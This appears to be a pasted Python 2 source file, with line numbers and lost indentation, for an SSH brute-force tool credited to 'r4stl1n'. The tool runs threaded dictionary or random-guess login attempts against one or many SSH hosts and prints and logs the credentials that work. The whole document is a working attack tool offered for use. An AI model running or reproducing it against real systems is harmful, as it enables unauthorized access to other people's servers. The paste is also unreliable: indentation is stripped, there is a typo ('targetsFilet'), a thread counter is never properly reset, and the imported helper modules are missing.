sdqfsdfds

1. '''
2. Created on Aug 25, 2011
3.  
4. @author: r4stl1n
5. '''
6.  
7. import sys
8. import random
9. from optparse import OptionParser
10.  
11. import Util
12. from Connection import Connection
13.  
14. class SSHBruteForce():
15.  
16. def __init__(self):
17. self.info = "Simple SSH Brute Forcer: By r4stl1n"
18. self.targetIp = ""
19. self.targetPort = 0
20. self.targets = []
21. self.usernames = []
22. self.passwords = []
23. self.connections = []
24. self.amountOfThreads = 0
25. self.currentThreadCount = 0
26. self.timeoutTime = 0
27. self.outputFileName = None
28. self.singleMode = False
29. self.verbose = False
30. self.bruteForceLength = 0
31. self.bruteForceAttempts = 0
32. self.bruteForceMode = False
33. self.characters = "abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
34.  
35. def startUp(self):
36. usage = '%s [-i targetIp] [-U usernamesFile] [-P passwordsFile]' % sys.argv[0]
37.  
38. optionParser = OptionParser(version = self.info, usage = usage)
39.  
40. optionParser.add_option('-i', dest = 'targetIp',
41. help = 'Ip to attack')
42. optionParser.add_option('-p', dest = 'targetPort',
43. help = 'Ip port to attack', default = 22)
44. optionParser.add_option('-d', dest='typeOfAttack',
45. help = 'Dictionary Attack', default = False)
46. optionParser.add_option('-a', dest='attemptAmount',
47. help = "Number of attempts before stopping", default = 2)
48. optionParser.add_option('-l', dest='lengthLimit',
49. help = 'Length of bruteforce strings', default = 8)
50. optionParser.add_option('-I', dest = 'targetsFile',
51. help = 'List of IP\'s and ports')
52. optionParser.add_option('-U', dest = 'usernamesFile',
53. help = 'Username List file')
54. optionParser.add_option('-P', dest = 'passwordsFile',
55. help = 'Password List file')
56. optionParser.add_option('-t', type = 'int', dest = 'threads',
57. help = 'Amount of Threads', default = 10)
58. optionParser.add_option('-T', type = 'int', dest = 'timeout',
59. help = 'Timeout Time', default = 15)
60. optionParser.add_option('-O', dest = "outputFile",
61. help = 'Output File Name', default = None)
62. optionParser.add_option('-v', '--verbose', action='store_true',
63. dest='verbose', help='verbose')
64.  
65. (options, args) = optionParser.parse_args()
66.  
67. #First a check is used to see if there is at least a singleIp set or a targetList set
68. if not options.targetIp and not options.targetsFile:
69. optionParser.print_help()
70. sys.exit(1)
71.  
72. else:
73. #Check to see if we are running a dictionary attack or a bruteforce
74. if bool(options.typeOfAttack) == True:
75. #Then another check to make sure the Username list and passwordlist are filled
76. if options.usernamesFile and options.passwordsFile:
77. #Then we check if it is a single ip only
78. if options.targetIp and not options.targetsFile:
79. self.singleMode = True
80. self.singleTarget(options)
81. elif not options.targetIp and options.targetsFile:
82. self.multipleTargets(options)
83. else:
84. optionParser.print_help()
85. sys.exit(1)
86. else:
87. optionParser.print_help()
88. sys.exit(1)
89. else:
90. #setup the brtue force
91. self.bruteForceMode = True
92. #Then we check if it is a single ip only
93. if options.targetIp and not options.targetsFile:
94. self.singleMode = True
95. self.singleTarget(options)
96. elif not options.targetIp and options.targetsFilet:
97. self.multipleTargets(options)
98. else:
99. optionParser.print_help()
100. sys.exit(1)
101.  
102. def singleTarget(self,options):
103. self.targetIp = options.targetIp
104. self.targetPort = options.targetPort
105. self.amountOfThreads = options.threads
106. self.timeoutTime = options.timeout
107. self.outputFileName = options.outputFile
108. self.verbose = options.verbose
109. self.bruteForceLength = options.lengthLimit
110. self.bruteForceAttempts = options.attemptAmount
111.  
112. if bool(options.typeOfAttack):
113. self.usernames = Util.fileContentsToList(options.usernamesFile)
114. self.passwords = Util.fileContentsToList(options.passwordsFile)
115. self.showStartInfo()
116. self.dictionaryAttackSingle()
117. else:
118. self.bruteForceSingle();
119. self.showStartInfo()
120.  
121. def multipleTargets(self,options):
122. self.targets = Util.fileContentsToTuple(options.targetsFile)
123. self.amountOfThreads = options.threads
124. self.timeoutTime = options.timeout
125. self.outputFileName = options.outputFile
126. self.verbose = options.verbose
127. self.bruteForceLength = options.lengthLimit
128. self.bruteForceAttempts = options.attemptAmount
129.  
130. if bool(options.typeOfAttack):
131. self.usernames = Util.fileContentsToList(options.usernamesFile)
132. self.passwords = Util.fileContentsToList(options.passwordsFile)
133. self.showStartInfo()
134. self.dictionaryAttackMultiple()
135. else:
136. self.bruteForceMultiple()
137. self.showStartInfo()
138.  
139.  
140. def showStartInfo(self):
141. print "[*] %s " % self.info
142. if self.singleMode:
143. print "[*] Brute Forcing %s " % self.targetIp
144. else:
145. print "[*] Loaded %s Targets " % str(len(self.targets))
146.  
147. if self.bruteForceMode == False:
148. print "[*] Loaded %s Usernames " % str(len(self.usernames))
149. print "[*] Loaded %s Passwords " % str(len(self.passwords))
150. print "[*] Brute Force Starting "
151.  
152. if self.outputFileName is not None:
153. Util.appendLineToFile("%s " % self.info, self.outputFileName)
154. if self.singleMode:
155. Util.appendLineToFile("Brute Forcing %s " % self.targetIp, self.outputFileName)
156. else:
157. Util.appendLineToFile("Loaded %s Targets " % str(len(self.targets)), self.outputFileName)
158. Util.appendLineToFile("Loaded %s Usernames " % str(len(self.usernames)), self.outputFileName)
159. Util.appendLineToFile("Loaded %s Passwords " % str(len(self.passwords)), self.outputFileName)
160. Util.appendLineToFile("Brute Force Starting ", self.outputFileName)
161.  
162. def dictionaryAttackSingle(self):
163. for username in self.usernames:
164. for password in self.passwords:
165.  
166. self.createConnection(username, password, self.targetIp,
167. self.targetPort, self.timeoutTime)
168. if self.currentThreadCount == self.amountOfThreads:
169. self.currentThreadResults()
170. self.currentThreadResults()
171.  
172. def dictionaryAttackMultiple(self):
173. for target in self.targets:
174. for username in self.usernames:
175. for password in self.passwords:
176. self.createConnection(username, password, target[0],
177. int(target[1]), self.timeoutTime)
178. if self.currentThreadCount == self.amountOfThreads:
179. self.currentThreadResults()
180. self.currentThreadResults()
181.  
182. def bruteForceSingle(self):
183. for x in range(int(self.bruteForceAttempts)):
184. randomUserString = ""
185. randomPasswordString = ""
186. randomStringLength = random.randint(4,int(self.bruteForceLength))
187. for y in range(randomStringLength):
188. randomUserString = randomUserString+random.choice(self.characters)
189.  
190. randomStringLength = random.randint(4,int(self.bruteForceLength))
191.  
192. for z in range(randomStringLength):
193. randomPasswordString = randomPasswordString + random.choice(self.characters)
194.  
195. self.createConnection(randomUserString, randomPasswordString, self.targetIp,
196. self.targetPort, self.timeoutTime)
197. if self.currentThreadCount == self.amountOfThreads:
198. self.currentThreadResults()
199. self.currentThreadResults()
200.  
201. def bruteForceMultiple(self):
202. for target in self.targets:
203. for x in range(self.bruteForceAttempts):
204. randomUserString = ""
205. randomPasswordString = ""
206. randomStringLength = random.randint(4,self.bruteForceLength)
207.  
208. for y in range(randomStringLength):
209. randomUserString = randomUserString+random.choice(self.characters)
210.  
211. randomStringLength = random.randint(4,self.bruteForceLength)
212.  
213. for z in range(randomStringLength):
214. randomPasswordString = randomPasswordString + random.choice(self.characters)
215.  
216. self.createConnection(randomUserString, randomPasswordString, target,
217. self.targetPort, self.timeoutTime)
218. if self.currentThreadCount == self.amountOfThreads:
219. self.currentThreadResults()
220.  
221. self.currentThreadResults()
222.  
223. def createConnection(self, username, password, targetIp, targetPort, timeoutTime):
224. connection = Connection(username, password, targetIp, targetPort, timeoutTime)
225. connection.start()
226.  
227. self.connections.append(connection)
228. self.currentThreadCount += 1
229. if self.verbose:
230. print "[*] Adding Target: {0}, Testing with username: {1}, testing with password: {2}" .format(targetIp, username, password)
231.  
232. def currentThreadResults(self):
233. for connection in self.connections:
234. connection.join()
235.  
236. if connection.status == 'Succeeded':
237. print "[#] TargetIp: %s " % connection.targetIp
238. print "[#] Username: %s " % connection.username
239. print "[#] Password: %s " % connection.password
240.  
241. if self.outputFileName is not None:
242. Util.appendLineToFile("TargetIp: %s " % connection.targetIp, self.outputFileName)
243. Util.appendLineToFile("Username: %s " % connection.username, self.outputFileName)
244. Util.appendLineToFile("Password: %s " % connection.password, self.outputFileName)
245.  
246. if self.singleMode:
247. self.completed()
248. else:
249. pass
250.  
251. self.clearOldThreads()
252.  
253. def clearOldThreads(self):
254. self.connections = []
255. self.threadCount = 0
256.  
257. def completed(self):
258. print "[*] Completed Brute Force."
259. sys.exit(0)
260.  
261. if __name__ == '__main__':
262. sshBruteForce = SSHBruteForce()
263. sshBruteForce.startUp()
264. print "[*] Brute Force Completed"